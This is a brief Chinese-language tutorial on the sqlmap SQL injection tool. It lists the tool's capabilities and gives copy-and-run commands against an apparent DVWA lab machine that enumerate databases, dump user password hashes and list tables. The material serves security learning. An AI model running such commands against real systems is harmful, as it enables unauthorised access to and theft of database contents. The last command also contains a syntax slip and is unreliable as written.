简介

SQLMAP是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL和SQL注入漏洞，其广泛的功能和选项包括数据库指纹，枚举，数据库提权，访问目标文件系统，并在获取操作权限时执行任意命令。
SQLMAP是开源的自动化SQL注入工具，由Python写成，具有如下特点：
1、完全支持MySQL、Oracle、PostgreSQL、MSSQL、Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。
2、完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。
3、在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。
4、支持枚举用户、密码、哈希、权限、角色、数据库、数据表和列
5、支持自动识别密码哈希格式并通过字典破解密码哈希。
6、支持完全地下载某个数据库中的某个表、也可以只下载某个表中的某几列。
7、支持在数据库管理系统中搜索指定的数据库名、表名和列名
8、当数据库管理系统是MySQL、PostgreSQL或者MSSQL时支持下载或上传文件。
9、当数据库管理系统是MySQL、PostgreSQL或者MSSQL时支持执行任意命令并回显标准输出。

下载

官网：https://sqlmap.org/
或者kali里

使用

sqlmap -u "http://192.168.11.129/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=afir24o2bp9b866nqld0k41t3t; security=low" --batch --dbs

命令复制里面就是干

查看用户名密码

sqlmap -u "http://192.168.11.129/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=afir24o2bp9b866nqld0k41t3t; security=low" --batch --users --passwords

查看某数据库中的所有表

sqlmap -u "http://192.168.11.129/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=afir24o2bp9b866nqld0k41t3t; --batch --D dvwa --tables